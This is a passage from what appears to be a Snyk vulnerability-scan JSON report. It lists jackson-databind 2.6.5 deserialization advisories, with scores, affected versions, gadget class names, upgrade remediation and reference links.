\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92902", - "probability": "0.05021", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11619" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-27xj-rqx5-2255" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:59:04.995807Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.585105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "XuYuanzhen" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2704", - "title": "Github Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", 
- "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.439153Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", - "epssDetails": { - "percentile": "0.93100", - "probability": "0.05308", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14062" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c265-37vj-cwcc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-05-29T15:36:30.302636Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-01T15:36:06Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-05-29T15:36:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.587184Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Al1ex@knownsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2765", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": 
"high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.171514Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", - "epssDetails": { - "percentile": "0.91500", - "probability": "0.03413", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14195" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mc6h-4qgp-37qh" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-14T14:48:40.820120Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-14T14:45:09Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-14T15:32:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.570033Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Topsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2688", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - 
"cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.405517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.94931", - "probability": "0.10105", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14060" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-j823-4qch-3rgm" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T10:29:46.691157Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:23:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - 
"groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:46:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.574354Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2698", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "cvssV3BaseScore": 8.1,
- "modificationTime": "2024-03-11T09:53:54.565244Z"
- }
- ],
- "cvssSources": [
- {
- "type": "primary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C",
- "assigner": "Snyk",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-06T13:55:38.989304Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "assigner": "NVD",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:51:24.681468Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "assigner": "Red Hat",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:53:54.565244Z"
- }
- ],
- "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n",
- "epssDetails": {
- "percentile": "0.91508",
- "probability": "0.03404",
- "modelVersion": "v2023.03.01"
- },
- "identifiers": {
- "CVE": [
- "CVE-2020-14061"
- ],
- "CWE": [
- "CWE-502"
- ],
- "GHSA": [
- "GHSA-c2q3-4qrh-fm48"
- ]
- },
- "packageName": "com.fasterxml.jackson.core:jackson-databind",
- "proprietary": false,
- "creationTime": "2020-06-15T11:03:46.232208Z",
- "functions_new": [
- {
- "version": [
- "[,2.10.0)"
- ],
- "functionId": {
- "className": "com.fasterxml.jackson.databind.ObjectMapper",
- "functionName": "enableDefaultTyping"
- }
- }
- ],
- "alternativeIds": [],
- "disclosureTime": "2020-06-15T10:59:39Z",
- "exploitDetails": {
- "sources": [
- "Snyk"
- ],
- "maturityLevels": [
- {
- "type": "secondary",
- "level": "Not Defined",
- "format": "CVSSv3"
- },
- {
- "type": "primary",
- "level": "Proof of Concept",
- "format": "CVSSv4"
- }
- ]
- },
- "packageManager": "maven",
- "mavenModuleName": {
- "groupId": "com.fasterxml.jackson.core",
- "artifactId": "jackson-databind"
- },
- "publicationTime":
"2020-06-15T15:45:37Z",
- "severityBasedOn": "CVSS",
- "modificationTime": "2024-03-11T09:53:54.565244Z",
- "socialTrendAlert": false,
- "severityWithCritical": "high",
- "from": [
- "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT",
- "com.fasterxml.jackson.core:jackson-databind@2.6.5"
- ],
- "upgradePath": [
- false,
- "com.fasterxml.jackson.core:jackson-databind@2.6.7.4"
- ],
- "isUpgradable": true,
